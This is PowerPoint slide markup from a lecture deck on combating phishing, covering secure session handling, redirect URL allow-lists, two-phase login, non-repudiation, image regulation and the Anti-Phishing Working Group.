    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21937924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D0B8B8CD-4701-4097-9C59-C4693201B5DC}"/>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56323" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E97C93-47AF-4D00-88EA-6E6C0972F8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Session Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRP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Make session identifiers long, complicated and difficult to guess.</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Set expiry time limits for the SessionID’s and should be checked for every client request.</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Application should be capable of revoking active SessionID’s and not recycle the same SessionID.</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Any attempt the invalid SessionID should be redirected to the login page.</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Never accept session information within a URL.</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Protect the session via SSL.</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Session data should be submitted as a POST.</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After authenticating, a new SessionID should be used (HTTP &amp; HTTPS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never let the users choose the SessionID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>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321DE3E0-71A8-4A54-A1B5-B35E2740BC39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{460B298B-F343-4AE2-9E4A-A8E78851D1CE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10522255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61119005-497F-473C-953C-C02ABADAF062}"/>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46083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. URL Qualification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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Do not reference redirection URL in the browser’s URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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Always maintain a valid approved list of redirection url’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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Never allow customers to supply their own URL’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">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Never allow IP addresses to be user in URL information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>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4C16EE92-DDE1-4216-AC7F-3BB90E402FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51C3F0A8-F7FC-4CE7-9258-758C6D9E6A12}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580214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274638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Some characteristics of a phishing email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11265" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1138238" y="1138238"/>
            <a:ext cx="6867525" cy="4581525"/>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388035F9-D6EB-4823-87F7-423D2F2A0673}"/>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48131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5. Authentication Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">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Ensure that a 2-phase login process is in place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">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Personalize the content	   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-533400">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Design a strong token-based authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F886EFD-82CF-46E3-849C-06DF67247CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2A875E26-18B7-40A2-B59A-C4E06A2FEF47}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41266760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81227DC9-D553-4300-8F81-613FC6A66136}"/>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50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6. Transaction non-repudiation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To ensure authenticity and integrity of the transaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC476E0-06E3-40BF-88C1-765075B5593C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E065274A-D4EE-4DDA-A8AF-6FAA233FCF64}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33500447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396C11ED-BC73-43EE-8802-55B91C9C4F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>How to combat phishing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>7. Image Regulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Image Cycling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session-bound images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">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888227E8-69E2-41DA-89ED-C1BDF94B532F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{37AA4F8E-5ECE-47EC-941D-2AEF42821A98}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8137756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AEA7D3FC-FD9F-4DF8-B37C-0BE393AA2A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Organizations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275"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SzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Anti-Phishing Working Group (APWG)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The APWG has over 2300+ members from over 1500 companies &amp; agencies worldwide. Member companies include leading security companies such as Symantec, McAfee and VeriSign. Financial Industry members include the ING Group,VISA, Mastercard and the American Bankers Association. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E121626-B103-4519-9314-36418003DDA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{775C2F22-D287-4D0D-8F9A-B96C43E8DCB6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36106639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ltLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00009E"/>
                </a:solidFill>
                <a:latin typeface="Monotype Corsiva" panose="03010101010201010101" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>What does all the above imply?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00009E"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
